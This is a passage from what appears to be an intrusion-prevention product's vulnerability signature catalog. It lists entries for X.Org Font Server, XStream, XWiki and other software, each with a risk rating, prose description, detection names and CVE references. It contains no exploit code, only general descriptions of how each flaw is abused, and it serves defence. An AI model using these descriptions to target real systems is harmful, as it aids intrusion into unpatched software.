Description: The X.Org Font Server suffers from multiple vulnerabilities related to the handling of QueryXExtents and QueryXBitmaps functions. The vulnerabilities are due to integer overflows that lead to buffer overflows and allow arbitrary code execution. Remote attackers can exploit these vulnerabilities by sending malicious requests over TCP to a vulnerable host.
Situation: Generic_CS-X.org-X-Font-Server-QueryXBitmaps-And-QueryXExtents-Integer-Overflow
References:
CVE-2007-4568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4568
BID-25898
http://www.securityfocus.com/bid/25898
Back to top

Xitami-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability: Denial of Service (DoS) vulnerability in Xitami HTTP server
Risk: Low
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Imatix Xitami for Windows
Type: Malfunction
Description: Xitami HTTP Server for Windows is vulnerable to a Denial of Service (DoS) attack. An attacker can send a URL request appended with MSDOS device name to the server to cause the server to crash.
Situation: HTTP_CSU-Get-Msdos-Device-Name-DoS
References:
CVE-2001-0391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0391
BID-2622
http://www.securityfocus.com/bid/2622
OSVDB-11640
http://www.osvdb.org/11640
Back to top

XLink-FTP-Server-Buffer-Overflow

About this vulnerability: XLink FTP Server bundled with Omni NFS Server 5.2 Buffer Overflow
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: XLink Omni
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in XLink FTP Server bundled with Omni NFS Server 5.2 which allows remote attackers to execute arbitrary code, or cause a denial of service condition.
Situation: FTP_CS-XLink-FTP-Server-Buffer-Overflow
References:
CVE-2006-5792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5792
OSVDB-58646
http://www.osvdb.org/58646
Back to top

XLink-Omni-NFS-Server-Buffer-Overflow

About this vulnerability: XLink Omni NFS Server 5.2 Buffer Overflow
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000
Software: XLink Omni
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in XLink Omni NFS Server 5.2, in nfsd.exe, which allows remote attackers to execute arbitrary code, or cause a denial of service condition.
Situation: Generic_CS-XLink-Omni-NFS-Server-Buffer-Overflow
References:
CVE-2006-5780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5780
BID-20941
http://www.securityfocus.com/bid/20941
OSVDB-30224
http://www.osvdb.org/30224
Back to top

XM-Easy-Personal-FTP-Server-Nlst-DoS

About this vulnerability: An XM Easy Personal FTP Server Nlst DoS vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: XM Easy Personal FTP Server
Type: Input Validation
Description: A vulnerability in XM Easy Personal FTP Server, versions 5.6.0 and 5.7.0, which allows remote attackers to cause a denial of service condition via a crafted argument to the NLST command.
Situation: FTP_CS-XM-Easy-Personal-FTP-Server-Nlst-DoS
References:
CVE-2008-5626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5626
OSVDB-50837
http://www.osvdb.org/50837
Back to top

Xml-Pear-Xml-RPC-And-Phpxmlrpc-Eval-Command-Execution

About this vulnerability: Shell command execution vulnerability in PEAR XML_RPC and PHPXMLRPC
Risk: Moderate
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: PHP
Type: Malfunction
Description: PEAR XML_RPC and PHPXMLRPC libraries suffer from an eval injection vulnerability that allows remote attackers to execute arbitrary shell commands on a vulnerable system.
Situation: HTTP_CS-Xml-Pear-Xml-RPC-And-Phpxmlrpc-Eval-Command-Execution
References:
CVE-2005-1921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1921
BID-14088
http://www.securityfocus.com/bid/14088
Back to top

XMLDsig-Hmac-Truncation-Authentication-Bypass

About this vulnerability: A vulnerability in XMLDsig ds:HMACOutputLength parameter
Risk: Moderate
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client; Generic HTTP server
Type: Insecure Configuration
Description: A design weakness exists in W3C security standard recommendation for XML Signature Syntax and Processing (XMLDsig). The weakness in design might cause implementations based on this design to be vulnerable to an authentication bypass by remote attackers. More specifically, the XMLDsig recommendation includes support for HMAC truncation (as specified in RFC2104). The XMLDsig specification, however, does not follow the RFC2104 recommendation and does not prevent truncation to less than half of the length of the hash output. When HMAC truncation is under the control of an attacker this can result in an effective authentication bypass.
Situation: HTTP_CS-XMLDsig-Hmac-Truncation-Authentication-Bypass
File-TextId_XMLDsig-Hmac-Truncation-Authentication-Bypass
References:
CVE-2009-0217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0217
BID-35671
http://www.securityfocus.com/bid/35671
OSVDB-55907
http://www.osvdb.org/55907
OSVDB-55895
http://www.osvdb.org/55895
MS10-041
http://technet.microsoft.com/security/bulletin/MS10-041
Back to top

XMRig_CPU_Miner_Binary_File

About this vulnerability: XMRig binary file was detected
Risk: Moderate
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Resource Starvation
Description: XMRig is a CPU based miner for Monero cryptocurrency. The software itself isn't malicious, but it's very usual that it's downloaded to the already infected system to mine cryptocurrency. Running XMRig can take a lot of resources from the system it's running on.
Situation: File-Binary_XMRig_CPU_Miner_Binary_File
File-Exe_XMRig_CPU_Miner_Binary_File
Back to top

Xnview-PCT-File-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in XnView XnView
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: XnView
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in XnView. The vulnerability is due to a boundary error in processing image data in certain PCT files. An attacker can exploit this vulnerability by enticing a user to open a maliciously crafted file. A successful attack can lead to arbitrary code execution in the context of the user.
Situation: File-Binary_Xnview-PCT-File-Processing-Buffer-Overflow
References:
CVE-2013-2577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2577
OSVDB-95580
http://www.osvdb.org/95580
Back to top

Xpdf-Splash-Drawimage-Integer-Overflow

About this vulnerability: A vulnerability in Glyph & Cog Xpdf
Risk: High
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Glyph & Cog Xpdf
Type: Integer Overflow
Description: There is an integer overflow vulnerability in Glyph & Cog Xpdf. The vulnerability is due to a lack of input validation when handling images within PDF documents. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted PDF file with the affected application. Successful exploitation allows for arbitrary code injection and execution with the privileges of the currently logged in user.
Situation: HTTP_SS-Xpdf-Splash-Drawimage-Integer-Overflow
File-PDF_Xpdf-Splash-Drawimage-Integer-Overflow
References:
CVE-2009-3604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3604
BID-36703
http://www.securityfocus.com/bid/36703
Back to top

XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF

About this vulnerability: LibXpm buffer overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: libXpm
Type: Buffer Overflow
Description: XPM image decoding functions xpmParseColors and ParseAndPutPixels in LibXpm contain buffer overflow vulnerabilities. A user-supplied number of bytes are copied into a fixed-size buffer, thus potentially allowing arbitrary code execution.
Situation: HTTP_XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF
File-TextId_XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF
References:
CVE-2004-0687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0687
BID-11196
http://www.securityfocus.com/bid/11196
Back to top

XpoLog-Center-Remote-Command-Execution

About this vulnerability: A vulnerability in XpoLog Center
Risk: Moderate
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: XpoLog Center
Type: Input Validation
Description: A vulnerability in XpoLog Center
Situation: HTTP_CRL-XpoLog-Center-Remote-Command-Execution
Back to top

Xstream-Library-CVE-2020-26217-Insecure-Deserialization

About this vulnerability: A vulnerability in XStream XStream
Risk: Moderate
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Platform: Generic
Software: XStream
Type: Input Validation
Description: Improper validation of user input during unmarshalling of XML and JSON data causes a vulnerability in XStream. A successful exploitation may allow an attacker to execute arbitrary code on the target system.
Situation: File-Text_Xstream-Library-CVE-2020-26217-Insecure-Deserialization
References:
CVE-2020-26217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26217
Back to top

Xstream-Library-CVE-2020-26258-Insecure-Deserialization

About this vulnerability: A vulnerability in XStream
Risk: High
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Platform: Generic
Software: XStream
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in XStream Library. The vulnerability is due to improper validation of user input during unmarshalling of XML and JSON data. A remote attacker could exploit this vulnerability by sending specially crafted XML or JSON data to the affected application. Successful exploitation could allow the attacker to spoof requests as the target server.
Situation: File-Text_Xstream-Library-CVE-2020-26258-Insecure-Deserialization
References:
CVE-2020-26258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258
Back to top

Xstream-Library-CVE-2020-26259-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in XStream XStream
Risk: Moderate
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Platform: Generic
Software: XStream
Type: Input Validation
Description: Improper validation of JSON and XML data received by the XStream library causes an arbitrary file deletion vulnerability that can be exploited to delete files on the target system and cause a denial of service condition.
Situation: Generic_CS-Xstream-Library-CVE-2020-26259-Arbitrary-File-Deletion
References:
CVE-2020-26259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26259
Back to top

Xstream-Library-Insecure-Deserialization

About this vulnerability: An attempt to exploit a vulnerability in Xstream library insecure deserialization detected
Risk: High
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Platform: Generic
Software: XStream
Type: Input Validation
Description: XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream.
Situation: HTTP_CS_Xstream-Library-Insecure-Xml-Deserialization-CVE-2021-39144
References:
CVE-2021-39144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39144
Back to top

Xstream-Library-Reflectionconverter-Insecure-Deserialization

About this vulnerability: A vulnerability in XStream
Risk: Moderate
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: XStream
Type: Input Validation
Description: There has been reported an insecure serialization vulnerability in XStream Library. This vulnerability could be remotely exploited. Successful exploitation can lead in arbitrary code execution.
Situation: File-Text_Xstream-Library-Reflectionconverter-Insecure-Deserialization
References:
CVE-2019-10173
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10173
Back to top

Xstream-Unsafe-Deserialization

About this vulnerability: An attempt to exploit a vulnerability in XStream library detected
Risk: High
First detected in: sgpkg-ips-1668-5242
Last changed: sgpkg-ips-1668-5242
Platform: Generic
Software: XStream
Type: Input Validation
Description: XStream is an library that converts Java objects to XML, JSON, and other formats, and vice versa. Over the years, there have been quite a few unsafe deserialization vulnerabilities of the library found (See: https://x-stream.github.io/security.html). Attackers could exploit them to access private data, execute arbitrary code or shell commands in the context of the server running the XStream process, or cause a denial-of-service. This fingerprint aims to detect such exploits.
Situation: File-Text_Xstream-Unsafe-Deserialization
File-TextId_Xstream-Unsafe-Deserialization
Back to top

Xstream-Unsafe-Deserialization-CVE-2021-29505

About this vulnerability: A vulnerability in XStream
Risk: High
First detected in: sgpkg-ips-1836-5242
Last changed: sgpkg-ips-1836-5242
Platform: Generic
Software: XStream
Type: Input Validation
Description: Improper validation of user input during unmarshalling of XML data causes a vulnerability in XStream versions before 1.4.17. A successful exploitation may allow an attacker to execute arbitrary code on the target system.
Situation: File-Text_Xstream-Unsafe-Deserialization
References:
CVE-2021-29505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29505
Back to top

XTACACSD-Buffer-Overflow

About this vulnerability: An XTACACSD Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: XTACACSD
Type: Buffer Overflow
Description: A buffer overflow vulnerability in XTACACSD, versions 4.1.2 and before, which allows remote attackers to execute arbitrary code via a crafted CONNECT TACACS command.
Situation: Generic_UDP-XTACACSD-Buffer-Overflow
References:
CVE-2008-7232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7232
OSVDB-58140
http://www.osvdb.org/58140
Back to top

Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Xunlei Thunder
Risk: High
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Xunlei Thunder
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the PPlayer ActiveX component included in the Xunlei Thunder application. The vulnerability allows arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow
File-Text_Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow
References:
CVE-2007-6144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144
BID-26536
http://www.securityfocus.com/bid/26536
OSVDB-39680
http://www.osvdb.org/39680
Back to top

Xunlei-Thunder-Usage

About this vulnerability: Usage of Xunlei Thunder download accelerator
Risk: Moderate
First detected in: sgpkg-ips-184-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Xunlei Thunder
Type: Peer-to-Peer
Description: Xunlei Thunder is a download accelerator that can be used to share files and download files from various peer-to-peer networks.
Situation: HTTP_CS-Xunlei-Thunder-Network-Connect
Back to top

Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute

About this vulnerability: Vulnerability in Web Thunderbolt allows arbitary code execution
Risk: High
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Xunlei Thunderbolt
Type: Malfunction
Description: There is a vulnerability in Web Thunderbolt, a web download accelerator and manager. The application embeds an ActiveX object, ThunderServer, that allows downloading and execution of arbitary files.
Situation: HTTP_SS-Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute
File-Text_Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute
References:
CVE-2007-3296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3296
BID-24552
http://www.securityfocus.com/bid/24552
OSVDB-38474
http://www.osvdb.org/38474
Back to top

Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Web Thunderbolt allows arbitary code execution
Risk: High
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Xunlei Thunderbolt
Type: Malfunction
Description: There is a buffer overflow vulnerability in Xunlei Thunderbolt, a web download accelerator and manager. The application contains an ActiveX object, ThunderServer, that suffers from a buffer overflow vulnerability. This may lead to code execution with the privileges of the currently logged in user.
Situation: HTTP_SS-Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow
File-Text_Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow
References:
CVE-2007-5064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064
BID-25751
http://www.securityfocus.com/bid/25751
OSVDB-37777
http://www.osvdb.org/37777
Back to top

Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution

About this vulnerability: Vulnerability in Web Thunderbolt allows arbitary code execution
Risk: High
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Xunlei Thunderbolt
Type: Malfunction
Description: There is a vulnerability in Xunlei Thunderbolt, a web download accelerator and manager. The application embeds an ActiveX object, ThunderServer, that bypasses the security boundary, leading to code execution in the privileges of the currently logged on user.
Situation: HTTP_Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution
File-Text_Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution
References:
CVE-2007-3296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3296
BID-24552
http://www.securityfocus.com/bid/24552
OSVDB-38474
http://www.osvdb.org/38474
Back to top

Xupiter-Toolbar

About this vulnerability: Xupiter Toolbar
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Xupiter Toolbar
Type: Misconfiguration
Description: Xupiter Toolbar is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Xupiter-Toolbar
HTTP_CSH-Xupiter-Toolbar
Back to top

Xwiki-Attachmentselector-Docname-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: High
First detected in: sgpkg-ips-1584-5242
Last changed: sgpkg-ips-1584-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A code injection vulnerability has been reported in XWiki. The vulnerability is due to insufficient validation of user data used in the AttachmentSelector. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution under the security context of the server process.
Situation: HTTP_CRL-Xwiki-Attachmentselector-Docname-Code-Injection
References:
CVE-2023-29516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29516
Back to top

Xwiki-Deleteattachment-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1516-5242
Last changed: sgpkg-ips-1516-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Improper validation of deleted attachment file names causes a cross-site scripting vulnerability in Xwiki. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Xwiki-Deleteattachment-Stored-Cross-Site-Scripting
References:
CVE-2022-36096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36096
Back to top

Xwiki-Filename-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in XWiki
Risk: Moderate
First detected in: sgpkg-ips-1513-5242
Last changed: sgpkg-ips-1513-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Insufficient validation of attachment file names causes a cross-site scripting vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CS-Xwiki-Filename-Stored-Cross-Site-Scripting
References:
CVE-2022-36094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36094
Back to top

Xwiki-Legacynotificationadministration-Since-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1586-5242
Last changed: sgpkg-ips-1586-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Insufficient validation of user data used in the LegacyNotificationAdministration causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitary code on the target server.
Situation: HTTP_CRL-Xwiki-Legacynotificationadministration-Since-Code-Injection
References:
CVE-2023-29525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29525
Back to top

Xwiki-Mentionsmacro.XML-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1543-5242
Last changed: sgpkg-ips-1543-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Insufficient validation of mention macro values causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code with the privileges of the target program.
Situation: HTTP_CRL-Xwiki-Mentionsmacro.XML-Code-Injection
References:
CVE-2022-36098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36098
Back to top

Xwiki-Searchsuggestconfigsheet-Server-Side-Template-Injection

About this vulnerability: A vulnerability in XWiki
Risk: Moderate
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Improper input validation in properties of an object of XWiki.SearchSuggestSourceClass and XWiki.SearchSuggestConfig types causes a server-side template injection vulnerability in XWiki. A successful exploitation allows an attacker to execute code on the target system.
Situation: HTTP_CRL-Xwiki-Searchsuggestconfigsheet-Server-Side-Template-Injection
References:
CVE-2024-37901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37901
Back to top

Xwiki-Searchsuggestsourcesheet-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: The lack of input validation when when handling SearchSuggestSourceSheet objects causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Xwiki-Searchsuggestsourcesheet-Code-Injection
References:
CVE-2024-31465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31465
Back to top

Xwiki-Solrsearchmacros-Text-Code-Injection

About this vulnerability: A vulnerability in XWiki
Risk: Moderate
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Improper input validation of the text parameter provided to the SolrSearchMacros component causes a code injection vulnerability in XWiki. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Xwiki-Solrsearchmacros-Text-Code-Injection
References:
CVE-2025-24893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24893
Back to top

Xwiki-Tipspanel-XWiki.uiextensionclass-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Improper input validation in the tips panel causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Xwiki-Tipspanel-XWiki.uiextensionclass-Code-Injection
References:
CVE-2023-35166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35166
Back to top

Xwiki-Upload-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Improper input validation in file uploads causes a cross-site scripting vulnerability in XWiki. A successful exploitation can allow an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CS-Xwiki-Upload-Reflected-Cross-Site-Scripting
References:
CVE-2024-37900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37900
Back to top

Xwiki-Xwikiserverclasssheet-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Insufficient validation of requests using the XWikiServerClassSheet causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Xwiki-Xwikiserverclasssheet-Code-Injection
References:
CVE-2022-36099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36099
Back to top

Xwiki.org-Change-Request-Extension-Code-Injection

About this vulnerability: A vulnerability in XWiki.org Change Request extension
Risk: High
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A code injection vulnerability have been reported in XWiki Change Request extension. The vulnerability is due to improper input validation of change request titles. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code injection.
Situation: HTTP_CRL-Xwiki.org-Change-Request-Extension-Code-Injection
References:
CVE-2023-45138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45138
Back to top

Xwiki.org-Xwiki-Adminsheet-Section-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: The lack of input validation when handling the section parameter causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Xwiki.org-Xwiki-Adminsheet-Section-Code-Injection
References:
CVE-2023-46731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46731
Back to top

Xwiki.org-Xwiki-Databasesearch-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: High
First detected in: sgpkg-ips-1722-5242
Last changed: sgpkg-ips-1722-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A code injection vulnerability has been reported for XWiki.org XWiki. This vulnerability is due to improper input validation in the DatabaseSearch component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of of the current application.
Situation: HTTP_CRL-Xwiki.org-Xwiki-Databasesearch-Code-Injection
References:
CVE-2024-31982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31982
Back to top

Xwiki.org-Xwiki-Importinline-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: High
First detected in: sgpkg-ips-1611-5242
Last changed: sgpkg-ips-1611-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported for XWiki. This vulnerability is due to improper input validation of the editor and section parameters for the importinline view. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted link. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CSU-Xwiki.org-Xwiki-Importinline-Reflected-Cross-Site-Scripting
References:
CVE-2023-32071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32071
Back to top

Xwiki.org-Xwiki-Invitationguestactions-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: High
First detected in: sgpkg-ips-1618-5242
Last changed: sgpkg-ips-1618-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A code injection vulnerability have been reported in XWiki. The vulnerability is due to improper input validation when rendering a link in the Invitation Application. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code injection.
Situation: HTTP_CSU-Xwiki.org-Xwiki-Invitationguestactions-Code-Injection
References:
CVE-2023-35150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35150
Back to top

Xwiki.org-Xwiki-Movestep1.vm-Cross-Site-Scripting

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in XWiki. The vulnerability is due to insufficient validation of names when moving attachments. A remote, unauthenticated attacker could exploit this vulnerability by enticing a victim to use a crafted link. Successful exploitation could result in the execution of script code in the security context of a victim's browser.
Situation: HTTP_CRL-Xwiki.org-Xwiki-Movestep1.vm-Cross-Site-Scripting
References:
CVE-2022-36097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36097
Back to top

Xwiki.org-Xwiki-Notificationrssservice-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1614-5242
Last changed: sgpkg-ips-1614-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A code injection vulnerability have been reported in XWiKi. The vulnerability is due to improper input validation when rendering an RSS feed. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code injection.
Situation: HTTP_CRL-Xwiki.org-Xwiki-Notificationrssservice-Code-Injection
References:
CVE-2023-36469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36469
Back to top

Xwiki.org-Xwiki-Platform-Flamingo-Theme-UI-Remote-Code-Execution

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: High
First detected in: sgpkg-ips-1592-5242
Last changed: sgpkg-ips-1592-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A remote code execution vulnerability has been reported for XWiki. The vulnerability is due to improper escaping of the documentTree macro parameters. A remote attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation will result in remote code execution.
Situation: HTTP_CSU-Xwiki.org-Xwiki-Platform-Flamingo-Theme-UI-Remote-Code-Execution
References:
CVE-2023-29509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29509
Back to top

Xwiki.org-Xwiki-Registrationconfig-Code-Injection

About this vulnerability: A vulnerability in XWiki.org
Risk: High
First detected in: sgpkg-ips-1706-5242
Last changed: sgpkg-ips-1706-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A code injection vulnerability has been reported for XWiki.org XWiki. The vulnerability is due to lack of input validation when handling user registration requests. A remote, unauthenticated attacker can exploit this vulnerability by sending maliciously crafted requests to the vulnerable server. Successful exploitation could result in arbitrary code execution in the security context of the application.
Situation: HTTP_CRL-Xwiki.org-Xwiki-Registrationconfig-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-Registrationconfig-Code-Injection-Suspected-Compromise
References:
CVE-2024-21650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21650
Back to top

